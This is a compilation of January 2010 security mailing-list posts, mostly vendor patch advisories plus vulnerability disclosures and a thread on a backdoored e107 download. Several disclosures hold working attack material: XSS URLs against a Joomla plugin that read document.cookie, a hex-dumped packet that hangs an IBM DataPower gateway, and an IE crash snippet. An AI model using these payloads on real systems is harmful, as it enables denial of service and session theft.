[USN-890-4] PyXML vulnerabilities

[Jamie Strandboge]

===
Ubuntu Security Notice USN-890-4   January 26, 2010
python-xml vulnerabilities
CVE-2009-3560, CVE-2009-3720
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  python2.4-xml   0.8.4-1ubuntu3.1

After a standard system upgrade you need to restart any applications that
use PyXML to effect the necessary changes.

Details follow:

USN-890-1 fixed vulnerabilities in Expat. This update provides the
corresponding updates for PyXML.

Original advisory details:

 Jukka Taimisto, Tero Rontti and Rauli Kaksonen discovered that Expat did
 not properly process malformed XML. If a user or application linked against
 Expat were tricked into opening a crafted XML file, an attacker could cause
 a denial of service via application crash. (CVE-2009-2625, CVE-2009-3720)
 
 It was discovered that Expat did not properly process malformed UTF-8
 sequences. If a user or application linked against Expat were tricked into
 opening a crafted XML file, an attacker could cause a denial of service via
 application crash. (CVE-2009-3560)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python-xml_0.8.4-1ubuntu3.1.diff.gz
  Size/MD5:26092 7b735067d5b8494bfa9479a38b1f971f

http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python-xml_0.8.4-1ubuntu3.1.dsc
  Size/MD5:  663 064ad0d03d81132088df42f78850bfd7

http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python-xml_0.8.4.orig.tar.gz
  Size/MD5:   734751 04fc1685542b32c1948c2936dfb6ba0e

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python-xml_0.8.4-1ubuntu3.1_all.deb
  Size/MD5:11568 253250bca793d626d3f651a116259b00

http://security.ubuntu.com/ubuntu/pool/universe/p/python-xml/xbel-utils_0.8.4-1ubuntu3.1_all.deb
  Size/MD5:25206 e73978eb774cf39690739f0908fb32dc

http://security.ubuntu.com/ubuntu/pool/universe/p/python-xml/xbel_0.8.4-1ubuntu3.1_all.deb
  Size/MD5:24392 e4bab68a86bd7fb0dd85d39268716a64

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python2.4-xml_0.8.4-1ubuntu3.1_amd64.deb
  Size/MD5:   717460 763ab0e82cbd3767958753060145c5ab

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python2.4-xml_0.8.4-1ubuntu3.1_i386.deb
  Size/MD5:   708074 e34c9a1bdaaef83eb885104360d9e94f

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python2.4-xml_0.8.4-1ubuntu3.1_powerpc.deb
  Size/MD5:   716638 8ee8326bb735b20b18f0335c4485aadb

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python2.4-xml_0.8.4-1ubuntu3.1_sparc.deb
  Size/MD5:   706208 11751f3c1654c648dd145c88afc3002c





signature.asc
Description: Digital signature

Re: Re: e107 latest download link is backdoored

[track]

On the website youcan see : 
"We were recently informed of a very nasty exploit that, as far as we can see, 
affects almost all e107 0.7 releases. Everyone running e107 needs to get their 
sites updated as soon as possible. If you are a site owner and you are unable 
to upgrade for some reason (too much hacked core code), please contact me 
directly and I can help you with a quick-fix. ..." 
and you can also see that the website was modified ... ( script and a lot of 
links before the  ... ) 
and some other stuff on the main page doesn't seem very good .. so if you know 
how to contact them ... please do it :)

Re: [Full-disclosure] e107 latest download link is backdoored

[Fernando Augusto]

Fun stuff...

From here (Brazil) neither me nor anyone I asked, even through 
different carriers, are getting this kind of data while looking at 
http://e107.org/news.php I am not someone that talks here, but I 
believe that it should be looked with more care. I use Sophos here (up 
to date) and no warning was sent, so it gave me something to wander...


If someone wishes, I can pvt the content we got here from the site to 
compare...


Best Regards,

Fernando Augusto

Gregor Schneider escreveu:

Seems as if e107.org now is spreading some bad stuff:

Virus/Spyware Mal/ObfJS-CB! - at least that's what Sophos is telling me

Wondering why the admins of e107.org still keep this site up & running
- the site should have been taken down right after they saw that it ws
compromised.

Irresponsible from the e107.org-guys, imho...

Gregor
  

RE: Microsoft IE 6&7 Crash Exploit

[Santhosh]

Hi,

Can this exploit be used for remote code execution???

-Santhosh

-Original Message-
From: i...@securitylab.ir [mailto:i...@securitylab.ir] 
Sent: Tuesday, January 26, 2010 5:06 PM
To: bugtraq@securityfocus.com
Subject: Microsoft IE 6&7 Crash Exploit

#
# Securitylab.ir
#
# Application Info:
# Name: Microsoft IE
# Version: 6 & 7
# Tested on : XP(SP1/SP2/SP3)
#
# Vulnerability Info:
# Type: Crash
# Risk: Medium
#
Vulnerability:

IE.html
document.createElement("html").outerHTML
#
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_i...@yahoo.com
###

[SECURITY] [DSA 1978-1] New phpgroupware packages fix several vulnerabilities

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1978-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
January 26, 2010  http://www.debian.org/security/faq
- 

Package: phpgroupware
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2009-4414 CVE-2009-4415 CVE-2009-4416

Several remote vulnerabilities have been discovered in phpgroupware, a
Web based groupware system written in PHP. The Common Vulnerabilities 
and Exposures project identifies the following problems:

CVE-2009-4414

An SQL injection vulnerability was found in the authentication
module.

CVE-2009-4415

Multiple directory traversal vulnerabilities were found in the
addressbook module.

CVE-2009-4416

The authentication module is affected by cross-site scripting.


For the stable distribution (lenny) these problems have been fixed in
version 0.9.16.012+dfsg-8+lenny1.

For the unstable distribution (sid) these problems have been fixed in
version 0.9.16.012+dfsg-9.

We recommend that you upgrade your phpgroupware packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.012+dfsg.orig.tar.gz
Size/MD5 checksum: 19383160 bbfcfa12aca69b4032d7b4d38aeba85f
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.012+dfsg-8+lenny1.diff.gz
Size/MD5 checksum:70541 fc805ae50cd52606578ed95e8a5bde96
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.012+dfsg-8+lenny1.dsc
Size/MD5 checksum: 1662 0507c4e0a6be1d93a060a7c6222c84c0

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-email_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:  1167526 b7d47f4df02c98e3269fd2b8bce094f4
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-core-base_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:48252 80a0c4bf563e576fbad0b023fcca2f4b
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-calendar_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:   268338 acdc243f1b2cbcea42a548408232657d
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-addressbook_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:   180662 e0835bac92df72541b52912e80e1e852
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:22380 c12295c8f5f4abdf2f9d8c94ceefe4a1
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-news-admin_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:41572 d21d4ab4ce6adbb23a46a21fd0dd67cb
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-manual_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:93094 dc2bcd999a4a97a0acb8a0a9b156ea03
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-filemanager_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:95206 0faba6d54c83ac610d11a256a12eec67
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-phpgwapi_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:  1522130 c4ff77bb7c80222b04ccdb130f5d2db6
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-preferences_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:60034 b7b86ca86b431dbd7b637506db451196
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:20228 5563f9a3d9b4835b2c89cb1ba571b23f
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-core_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum: 4546 de306e6062f710d430704297106f192e
  
http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-admin_0.9.16.012+dfsg-8+lenny1_all.deb
Size/MD5 checksum:   192062 0427388ce20eb307946c6272856313b7
  
http://secur

More information on CVE-2009-3580

[Chris Travers]

One thing not noted in the security advisory or the full disclosure
email is that there are mitigating features which can be used in
vulnerable programs (SQL-Ledger, unpatched LedgerSMB) to mitigate,
though not eliminate, the risk of XSRF.

Current versions of SQL-Ledger and LedgerSMB have a session time out
option which can be set either by the administrator or by the user.
The session timeout value provides a window during which XSRF attacks
can happen.  In environments where this is a risk (for example, not
including closed networks of POS terminals), this session timeout can
be set low enough to make the attacks impractical.

Since XSRF remains a possibility in less critical areas of the
software in LedgerSMB 1.2, it is advised that administrators take
advantage of this measure as well.

I would generally recommend that SQL-Ledger users set the timeout low,
perhaps to a value between 30 and 120.  The value refers to the
timeout in seconds, so this would require a new password after any
short break.

Properly configured XSRF doesn't have to be a major problem with
either of these packages. However, properly configuring it poses some
significant burdens on employees so the proper value should be
determined by each customer.  The current default value (3600) which
sets the default value to one hour is way to high though.  This issue
will be documented as an issue in future versions of LedgerSMB.

Best Wishes,
Chris Travers

Cross-Site Scripting vulnerability in 3D Cloud for Joomla

[MustLive]

Hello Bugtraq!

I want to warn you about Cross-Site Scripting vulnerability in 3D Cloud
(mod_3dcloud) plugin for Joomla. Which I found and disclosed at 22.01.2010.

It is similar to XSS vulnerability in JVClouds3D for Joomla
(http://websecurity.com.ua/3839/). About millions of flash files
tagcloud.swf which are vulnerable to XSS attacks I mentioned in my article
XSS vulnerabilities in 34 millions flash files
(http://www.webappsec.org/lists/websecurity/archive/2010-01/msg00035.html).

XSS:

http://site/modules/mod_3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS.

Also it's possible to conduct HTML Injection attack, including in those 
flash files which have protection (in flash files or via WAF) against 
javascript and vbscript URI in parameter tagcloud.


HTML Injection:

http://site/modules/mod_3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Vulnerable are 3D Cloud 1.3 and previous versions.

I mentioned about this vulnerability at my site
(http://websecurity.com.ua/3883/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 

Paper: Weaning the Web off of Session Cookies

[Timothy D. Morgan]

Hello,

I've just posted a new paper some of you may be interested in:
  http://www.vsecurity.com/download/papers/WeaningTheWebOffOfSessionCookies.pdf 
 

While it's primarily an argument for fixing HTTP authentication, it
does contain information on a few weaknesses common in browsers,
including password manager issues and user interface vulnerabilities.

Feedback is more than welcome.

Enjoy,
tim


Abstract

In this paper, we compare the security weaknesses and usability
limitations of both cookie-based session management and HTTP digest
authentication; demonstrating how digest authentication is clearly the
more secure system in practice.  We propose several small changes in
browser behavior and HTTP standards that will make HTTP authentication
schemes, such as digest authentication, a viable option in future
application development.

[ MDVSA-2010:026 ] openldap

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:026
 http://www.mandriva.com/security/
 ___

 Package : openldap
 Date: January 26, 2010
 Affected: 2008.0, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability was discovered and corrected in openldap:
 
 libraries/libldap/tls_o.c in OpenLDAP, when OpenSSL is used, does
 not properly handle a \'\0\' (NUL) character in a domain name in
 the subject's Common Name (CN) field of an X.509 certificate, which
 allows man-in-the-middle attackers to spoof arbitrary SSL servers via
 a crafted certificate issued by a legitimate Certification Authority,
 a related issue to CVE-2009-2408 (CVE-2009-3767).
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3767
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 05d27c8e50b79e16c345756251c5e819  
2008.0/i586/libldap2.3_0-2.3.38-3.4mdv2008.0.i586.rpm
 c3b564ed72214c88e4f97b754baec0d3  
2008.0/i586/libldap2.3_0-devel-2.3.38-3.4mdv2008.0.i586.rpm
 cb184b75f27937fbf10bee2c4526ccb8  
2008.0/i586/libldap2.3_0-static-devel-2.3.38-3.4mdv2008.0.i586.rpm
 53a1cb617be31adf8002d03c975242df  
2008.0/i586/openldap-2.3.38-3.4mdv2008.0.i586.rpm
 48114cab21906ac3f736d669ea9c1a21  
2008.0/i586/openldap-clients-2.3.38-3.4mdv2008.0.i586.rpm
 a16e2a6e65d1f68eea0989590f0057b7  
2008.0/i586/openldap-doc-2.3.38-3.4mdv2008.0.i586.rpm
 1184787dc8596fc25c660396d012d6eb  
2008.0/i586/openldap-servers-2.3.38-3.4mdv2008.0.i586.rpm
 84c2fe50106a22d3fe27b3cdba4197d9  
2008.0/i586/openldap-testprogs-2.3.38-3.4mdv2008.0.i586.rpm
 b3facfc070aee1223d254ec984c61ab7  
2008.0/i586/openldap-tests-2.3.38-3.4mdv2008.0.i586.rpm 
 d43ec379be752a4229b996bf0212123e  
2008.0/SRPMS/openldap-2.3.38-3.4mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 fd10ca40cbd47ac92f0fb018abeb43b0  
2008.0/x86_64/lib64ldap2.3_0-2.3.38-3.4mdv2008.0.x86_64.rpm
 6f70689679ee97a5c0586190b0c14fe3  
2008.0/x86_64/lib64ldap2.3_0-devel-2.3.38-3.4mdv2008.0.x86_64.rpm
 804c10f2e0fc978bdaff791fffdf6cb3  
2008.0/x86_64/lib64ldap2.3_0-static-devel-2.3.38-3.4mdv2008.0.x86_64.rpm
 2e9eaa2bc8024bab086d6719371c104b  
2008.0/x86_64/openldap-2.3.38-3.4mdv2008.0.x86_64.rpm
 a11488a1a69f82d75bd9cbb0162810df  
2008.0/x86_64/openldap-clients-2.3.38-3.4mdv2008.0.x86_64.rpm
 2f8a0560815adc858f9751d50154233b  
2008.0/x86_64/openldap-doc-2.3.38-3.4mdv2008.0.x86_64.rpm
 82dba0aa278c64c7c588d468b910ed7f  
2008.0/x86_64/openldap-servers-2.3.38-3.4mdv2008.0.x86_64.rpm
 37c4c53990d046d55eb37a4c89b41421  
2008.0/x86_64/openldap-testprogs-2.3.38-3.4mdv2008.0.x86_64.rpm
 fb880135c85355b26e2769fadacb3563  
2008.0/x86_64/openldap-tests-2.3.38-3.4mdv2008.0.x86_64.rpm 
 d43ec379be752a4229b996bf0212123e  
2008.0/SRPMS/openldap-2.3.38-3.4mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 1edb07acb66ec501f451ab12e82c701f  
2009.0/i586/libldap2.4_2-2.4.11-3.2mdv2009.0.i586.rpm
 d89cc046166856ec10e6571646efc911  
2009.0/i586/libldap2.4_2-devel-2.4.11-3.2mdv2009.0.i586.rpm
 d3895a847d8aad9d09446162b0ffcd8d  
2009.0/i586/libldap2.4_2-static-devel-2.4.11-3.2mdv2009.0.i586.rpm
 069829021563439e98d464c942f8b465  
2009.0/i586/openldap-2.4.11-3.2mdv2009.0.i586.rpm
 d10c57b7e4b2e47350be4ed9e0653d13  
2009.0/i586/openldap-clients-2.4.11-3.2mdv2009.0.i586.rpm
 0e1cdfc7e0de6148feebdc28d7f957a5  
2009.0/i586/openldap-doc-2.4.11-3.2mdv2009.0.i586.rpm
 c14ac5126b17775363da034cb68557b0  
2009.0/i586/openldap-servers-2.4.11-3.2mdv2009.0.i586.rpm
 07f0a85987bcd586359852b7cad8649d  
2009.0/i586/openldap-testprogs-2.4.11-3.2mdv2009.0.i586.rpm
 9a51e08fa565f830672328a0c00fc8e8  
2009.0/i586/openldap-tests-2.4.11-3.2mdv2009.0.i586.rpm 
 9cf49efc39d9e3b1e33d815ce4ecbb9b  
2009.0/SRPMS/openldap-2.4.11-3.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 54e430c0735f09e81cbc01f8d6d2e0cb  
2009.0/x86_64/lib64ldap2.4_2-2.4.11-3.2mdv2009.0.x86_64.rpm
 a603ee71bb23a2482ba24d9b5aa0d441  
2009.0/x86_64/lib64ldap2.4_2-devel-2.4.11-3.2mdv2009.0.x86_64.rpm
 d2f3bb877cdbca3a7c19694ddf998f70  
2009.0/x86_64/lib64ldap2.4_2-static-devel-2.4.11-3.2mdv2009.0.x86_64.rpm
 d5679cdc3fe1a66c67856ff7cc820e97  
2009.0/x86_64/openldap-2.4.11-3.2mdv2009.0.x86_64.rpm
 f9e4916cb87578bc2ee52456b1cc8612  
2009.0/x86_64/openldap-clients-2.4.11-3.2mdv2009.0.x86_64.rpm
 45c0453372a06e434c92ee6d6e565326  
2009.0/x86_64/openldap-doc-2.4.11-3.2mdv2009.0.x86_64.rpm
 3688fdc6044b0c069cfddbcafb8570dd  
2009.0/x86_64/openldap-servers-2.4.11-3.2mdv2009.0.x86_64.rpm
 8ccdef4f24

Netsupport gateway remote DoS

[watcher60]

Vendor: Netsupport
Product: Netsupport Manager
Vendor contacted 11 Nov 2009, fixed 11 Jan 2010 in version 10.60.0006

Netsupport gateway is a feature packaged with the netsupport manager 
product."Delivering seamless Remote Control between PCs that may be located 
behind different firewalls. The NetSupport Gateway provides a stable and secure 
method for NetSupport enabled systems to locate and communicate via http."

In all versions prior to 10.60.0006 it is possible to remotely crash the 
service by simply telneting to the port and hitting return twice, thereby 
causing a DoS. In versions prior to 10.60.0005 this would only work from linux 
or mac hosts, however in 10.60.0005 (which was an attempt to fix the issue) it 
resulted in this working from both linux, mac & windows hosts. This variation 
was down to the differnces in carriage returns between OS's. I presume that the 
root issue was providing null header information though the vendor never 
confirmed.

regards

Matthew Whitehead (watcher60)

[security bulletin] HPSBMA02477 SSRT090177 rev.4 - HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS)

[security-alert]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01926980
Version: 4

HPSBMA02477 SSRT090177 rev.4 - HP OpenView Network Node Manager (OV NNM), 
Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2009-11-17
Last Updated: 2010-01-26

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified with HP OpenView Network Node 
Manager (OV NNM). The vulnerability could be exploited remotely to create a 
Denial of Service (DoS).

References: CVE-2009-3840

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Network Node Manager (OV NNM) v7.51, v7.53 running on HP-UX, Linux, 
Solaris, and Windows

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2009-3840(AV:N/AC:L/Au:N/C:N/I:N/A:P)   5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Damian Frizza of Core Security Technologies 
for reporting this vulnerability to security-al...@hp.com.

RESOLUTION

HP has made archive files available to resolve the vulnerability for NNM v7.53. 
The archive files require that certain patches be installed first.

The patches are available from http://support.openview.hp.com/selfsolve/patches

Note: The patches are not available from the HP IT Resource Center (ITRC).

The archive files are available using ftp.

Host
 Account
 Password

ftp.usa.hp.com
 sb02477
 Secure12

OV NNM v7.53
Operating_System
 Required_Patch
 Archive_File
 SHA-1_Hash_for_Archive_ File

HP-UX (IA)
 PHSS_38489 or subsequent
 solid_hotfix_HPUXIA.tar
 99db-fa73-51c1-98e8-c3e5-e709-4421-3586-3ab4-70b3

HP-UX (PA)
 PHSS_38488 or subsequent
 solid_hotfix_HPUXPA.tar
 6786-008e-f32e-6cc5-3f29-9a2a-cc87-d6b0-1fed-873b

Linux RedHatAS2.1
 LXOV_00087 or subsequent
 See note below
 See note below

Linux RedHat4AS-x86_64
 LXOV_00088 or subsequent
 solid_hotfix_Linux2.6.tar
 7508-fef1-be87-b599-1e29-07d5-7636-665c-7fec-b9fb

Solaris
 PSOV_03525 or subsequent
 solid_hotfix_Solaris_rev4.tar
 4376-3d34-c6e6-3397-658a-6fd5-93e2-e0cd-1764-44b1

Windows
 NNM_01193 or subsequent
 solid_hotfix_windows.zip
 5eb3-7208-bdac-dc97-09b7-59e4-ae0b-190c-d416-349d

Note: Installation instructions are in the README.txt file in each archive.

Note: The resolution for Solaris has been changed in rev.4 of this Security 
Bulletin. The ovdbcheck_hotfix_solaris.tar is no longer required. There is a 
new archive file for Solaris, solid_hotfix_Solaris_rev4.tar. That archive file 
requires PSOV_03525 or subsequent.

Note: This Security Bulletin will be revised when an archive file is available 
for Linux RedHatAS2.1.

OV NNM v7.51
Upgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above.
Patch bundles for upgrading from NNM v7.51 to NNM v7.53 are available using ftp:

Host
 Account
 Password

ftp.usa.hp.com
 nnm_753
 Update53

MANUAL ACTIONS: Yes
For NNM v7.51, upgrade to NNM v7.53 and apply the appropriate patches and 
archive files.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

For HP-UX OV NNM 7.51 and 7.53
HP-UX B.11.31
HP-UX B.11.23 (IA)
HP-UX B.11.23 (PA)
HP-UX B.11.11
=
OVNNMgr.OVNNM-RUN,fr=B.07.50.00
action: install the patches and archive files listed in the Resolution

END AFFECTED VERSIONS (for HP-UX)

HISTORY
Version:1 (rev.1) - 17 November 2009 Initial release
Version:2 (rev.2) - 18 November 2009 Vulnerability is DoS, ftp host is 
ftp.usa.hp.com
Version:3 (rev.3) - 9 December 2009 New README.txt in solid_hotfix_Solaris.tar
Version:4 (rev.4) - 26 January 2010 New archive file 
(solid_hotfix_Solaris_rev4.tar) and patch requirement for Solaris

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit informatio

[IBM Datapower XS40] Denial of Service

[erik]

It appears it is possible to disable the IBM DataPower XS40 Security Gateway 
device by sending a malformed packet 



to the network interface. The device will hang up itself without being able to 
recover from it (no auto-reboot).



Tested vulnerable firmware is 3.7.2.1

Issue fixed according to vendor in 3.8.0 and better 





To trigger the effect it is necessary to have IP.destination 0.0.0.0 in the 
packet, so routing can only take 



place on the same subnet by inputting the MAC-adress of the targeted device. 
Like this ICMP-packet, where 



00.14.5e.a1.b2.c3 is the target MAC-adress;



00 14 5e a1 b2 c3 00 11 25 82 7b 02 08 00 45 00 

00 50 4b 94 00 00 ff 01 5e f1 ac 12 65 15 00 00 

00 00 03 01 06 f6 00 00 00 00 00 00 00 00 00 00 

00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 

00 20 ed 58 00 00 ff 11 a9 d4 ac 12 65 15 ac 12 

65 65 01 00 00 00 29 00 cd 00 00 08 00 00





After sending this (sometimes it's necessary to sent it multiple times), the 
device will hang and won't recover by itself.



Vendor's comment on this: 
http://www-01.ibm.com/support/docview.wss?rs=2362&uid=swg1IC61364

Microsoft IE 6&7 Crash Exploit

[info]

#
# Securitylab.ir
#
# Application Info:
# Name: Microsoft IE
# Version: 6 & 7
# Tested on : XP(SP1/SP2/SP3)
#
# Vulnerability Info:
# Type: Crash
# Risk: Medium
#
Vulnerability:

IE.html
document.createElement("html").outerHTML
#
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_i...@yahoo.com
###

Re: [Full-disclosure] e107 latest download link is backdoored

[Gregor Schneider]

Seems as if e107.org now is spreading some bad stuff:

Virus/Spyware Mal/ObfJS-CB! - at least that's what Sophos is telling me

Wondering why the admins of e107.org still keep this site up & running
- the site should have been taken down right after they saw that it ws
compromised.

Irresponsible from the e107.org-guys, imho...

Gregor
-- 
just because your paranoid, doesn't mean they're not after you...
gpgp-fp: 79A84FA526807026795E4209D3B3FE028B3170B2
gpgp-key available
@ http://pgpkeys.pca.dfn.de:11371
@ http://pgp.mit.edu:11371/
skype:rc46fi

Re: [Full-disclosure] e107 latest download link is backdoored

[David Sopas]

How they didn't noticed that, so obvious right? There're so many spam
links on the source page. They should fix it ASAP and check logs for
other possible modifications.


2010/1/26 Carsten Eilers :
> Hi,
>
> Bogdan Calin schrieb am Mon, 25 Jan 2010 12:58:50 +0200:
>
>>The latest version of e107, version 0.7.17 contains a PHP backdoor.
>>http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip
>
> The start page of e107.org, ,
> contains suspect, probable malicious JavaScript-Code at the
> top,followed by many links in the format
> medical spam,
> before the DOCTYPE-Declaration.
>
>
> Regards
>  Carsten
>
> --
> Dipl.-Inform. Carsten Eilers
> IT-Sicherheit und Datenschutz
>
> 
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Re: e107 latest download link is backdoored

[Carsten Eilers]

Hi,

Bogdan Calin schrieb am Mon, 25 Jan 2010 12:58:50 +0200:

>The latest version of e107, version 0.7.17 contains a PHP backdoor.
>http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip

The start page of e107.org, ,
contains suspect, probable malicious JavaScript-Code at the
top,followed by many links in the format
medical spam,
before the DOCTYPE-Declaration. 


Regards
  Carsten

-- 
Dipl.-Inform. Carsten Eilers
IT-Sicherheit und Datenschutz

Setting arbitrary Personas without user interaction in Firefox 3.6

[Artur Janc]

---
  Title: Setting arbitrary Personas without user interaction in Firefox 3.6
Product: Mozilla Firefox
Version: 3.6
PoC: http://wtikay.com/personas/
 By: Artur Janc
   Date: 01/26/2010
---

1. OVERVIEW

The recent release of Firefox 3.6 introduces support for browser "Personas"
-- lightweight image-based themes which alter the look and feel of the
browser chrome.

A malicious website can set a user's Persona to an arbitrary theme, disable
Undo functionality in the browser's information bar, and obfuscate the Persona
entry in the Themes pane of the Tools | Add-ons pane to make the detection and
deletion of a rogue theme somewhat more difficult.

2. DETAILS

2.1. Behavior

The ability to install or preview Personas is controlled by the same Allowed
Sites whitelist as for installing Firefox extensions. However, contrary to the
extensions installation process, setting Personas does *not* require the user's
explicit agreement (for example the post-upgrade "firstrun" page previews
featured Personas on hover). To give users control of the currently set
Persona, Firefox displays an information bar with "Undo" and "Manage Themes"
buttons upon any Persona-related action (preview or installation).

2.2. Vulnerability Description
Any XSS vulnerability in one of the two hosts whitelisted by default
(getpersonas.com and addons.mozilla.org) will allow the attacker to install and
activate an arbitrary Persona using a JavaScript event with a properly
specified DOM element as an argument, without prompting the user.

The PoC uses XSS in http://www.getpersonas.com/en-US/gallery/Designer/XXX

Setting the same rogue theme twice in quick succession will render the Undo
button useless, as the "previous" theme will be the same as the last one set by
the attacker.

The user will be able to click "Manage Themes" on the information bar to view
installed themes. However, all pieces of Persona-related information shown in
the list are controlled by the attacker, so nothing prohibits the attacker from
calling her theme "Default", setting the author to "Mozilla Corp." and setting
an innocuous icon and "preview" image to resemble the default Firefox theme.
The same Persona can be installed with multiple IDs to introduce clutter in the
menu and make detecting the rogue Persona and cleaning up the list more
painful.

2.3. Proof of Concept
http://wtikay.com/personas/
http://wtikay.com/personas/persona-non-grata.js

3. IMPACT

This issue might cause some inconvenience to users whose browsers' UI suddenly
starts showing intrusive ads or pornography, or becomes completely garbled
(see PoC), especially those not savvy enough to figure out which of the
installed Personas is causing the problem. Another, more surreptitious and
troubling possibility is to install a Persona indistinguishable from the
default theme (i.e.  transparent image) and use a custom updateURL argument to
get the victim's browser to periodically phone home to the attacker's
